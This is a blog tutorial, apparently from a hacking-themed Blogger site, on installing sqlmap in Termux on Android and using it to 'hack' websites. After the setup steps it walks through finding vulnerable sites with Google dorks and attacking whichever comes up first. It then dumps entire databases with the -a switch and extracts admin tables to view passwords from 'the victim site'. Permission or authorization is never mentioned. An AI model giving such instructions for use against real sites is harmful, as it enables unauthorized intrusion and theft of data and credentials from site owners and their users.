Header Ads

Breaking News
recent
Home Hack Website Android Hack Website Using SQLMAP Android

Hack Website Using SQLMAP Android

July 28, 2017


sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

 Requirements

Termux (Linux terminal contain many inbuilt commands)
Sqlmap (Most important use for sql injection)
File manager (to view log & db)

Patience & brain

 SQLMAP On Android : Installation

First install all apps from the above links and run them at least once. Download the sqlmap zip file and extract it in sdcard and change its name.

After that open Termux and run given command.

apt update && apt upgrade

It takes some time to update. It will prompt you that some space is required. You just have to install simply, press y to yes. It takes a small amount of space for installed files.
If you are using Android version 6.0+ phone, then you need to run this command or if you use lower version you can simply skip. It’s not mandatory, but I suggest you to run it.

            termux-setup-storage

   It will prompt you to allow permission of using your internal storage. To proceed just hit the Allow button and follow the next step.

 packages install python2

   This command will install Python in your termux. It asks you to install Python. Enter y for installing python2 in your termux.

Moving On!

 All set! You just need to find sqlmap.py script in your phone. In order to achieve this, navigate using cd. First you need to access root folder, so first run :

cd /

 Then type & hit

cd sdcard 
cd ls 

 It will show all contained files. Now you need to find sqlmap-master (extracted folder).

 cd sqlmap-master 

 cd sqlmap-master

Enter sqlmap-master (above command) two times.

If you already changed the name of sqlmap-master to sqlmap then you can run,

cd sqlmap

 cd sqlmap-master

You can take help of  “ls ” command to list down all files on that location.
Navigate to the sqlmap-master folder where the sqlmap.py is stored. Now to run the sqlmap you need following command :

python2 sqlmap.py

If you see this red color sqlmap then relax yourself! You are done with the installation of sqlmap. Now next step is hacking the website using sqlmap. You need to find a website with SQL vulnerability. For this, use sqlmap google dork to find websites.
If you are using google dork then type the following:

python2 sqlmap.py -g  your_keyword

If you want to use direct URL then :

python2 sqlmap.py -u your_url

 You can refer sqlmap official site for help or just type python2 sqlmap.py -h  for Basic help & python2 sqlmap.py -hh for Advanced help.

If you want to hack entire site with all database and tables just append -a to the either of the commands python2 sqlmap.py -g  your_keyword  or  python2 sqlmap.py -u your_url
In google dork method,  it will give you three option : 1. Yes for attacking first site, which comes in result. For proceeding further, you need to type “y”.  2. For skipping to the next target you can use “n” 3. For quitting, use “q”.

Get Set Attack!

After that it will start attack on the victim site. Wait until it completes.  It may prompt you with the following question, so just simply hit “y”.

After that it will show you several tables and other data that it hacked. Don’t  worry, you can view it in log when process is done.

Now if you want to see all the tables, you need to run following command :

python2 sqlmap.py -u url --tables

It will return all tables name that are already hacked by sqlmap. Now choose the table you want to view by simply entering the following command. In my case I want to view the admin table. To view password, I run

python2 sqlmap.py -u url -T your_table name

This command will save your table data and log file in root folder which is not accessible to normal  non rooted phone but no worry we have solution this terminal can access so we are going to copy this file to your internal storage for view it with non rooted phone also

cp source //sdcard

Just replace the source with source given by terminal in above command it will omit the dump file but don’t worry we don’t need it now navigate to the file using your inbuilt file manager or use ES file manager



Congo! You successfully hacked a  website using sqlmap with sql injection on Android.
Tags :
Powered by Blogger.